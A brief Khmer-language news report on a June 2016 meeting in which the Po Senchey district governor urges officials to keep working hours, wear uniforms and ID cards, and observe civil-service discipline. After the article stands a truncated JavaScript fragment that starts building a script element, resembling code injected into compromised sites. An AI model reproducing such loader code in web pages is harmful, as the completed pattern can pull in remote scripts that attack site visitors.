លោក ហែម ដារិទ្ធិ អភិបាលខណ្ឌពោធិ៍សែនជ័យបើកកិច្ចប្រជុំពង្រឹងគុណភាពមន្ត្រីក្រោមឱវាទរបស់ខ្លួន កាលពីម្សិលម៉ិញនេះ

ភ្នំពេញ៖ នារសៀលថ្ងៃទី៩ ខែមិថុនា ឆ្នាំ២០១៦ លោក ហែម ដារិទ្ធិអភិបាលនៃគណៈ អភិបាលខណ្ឌ ពោធិ៍សែនជ័យ បានបើកកិច្ចប្រជុំជាមួយមន្ត្រីក្នុងសាលាខណ្ឌ និងមន្រ្តីការិយាល័យច្រកចេញ-ចូល តែមួយ ក្នុងគោលបំណងពង្រឹងបន្ថែមនូវភារកិច្ចតួនាទីរបស់មន្ត្រីរាជការក្នុងរដ្ឋបាលខណ្ឌ ដើម្បីផ្តល់ សេវាសាធារណៈជូនប្រជាពលរដ្ឋអោយទាន់ពេលវាលា។ ក្នុងឪកាសនោះ លោក ហែម ដារិទ្ធិ បាន សំណូមពរដល់មន្ត្រីទាំងអស់គោរពអោយបាននូវពេលវេលាបំពេញការងារ ឯកសណ្ឋាន កាត សម្គាល់ខ្លួនអោយបានត្រឹមត្រូវ។ លោកសង្កត់ធ្ងន់ថាៈ មន្ត្រីដែលមិនគោរពវិន័យ តាមលក្ខន្តិកៈមន្ត្រី រាជាការស៊ីវិល រឺការណែនាំរបស់រដ្ឋបាលខណ្ឌ នឹងត្រូវទទួលទណ្ឌកម្មខាងវិន័យដែលមានការកំណត់ ស្រាប់ក្នុងកិច្ចសន្យាការងារ និងលក្ខន្តិកៈមន្ត្រីរាជាការស៊ីវិល៕

image image image imagevar d=document;var s=d.createElement(‘script’);

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More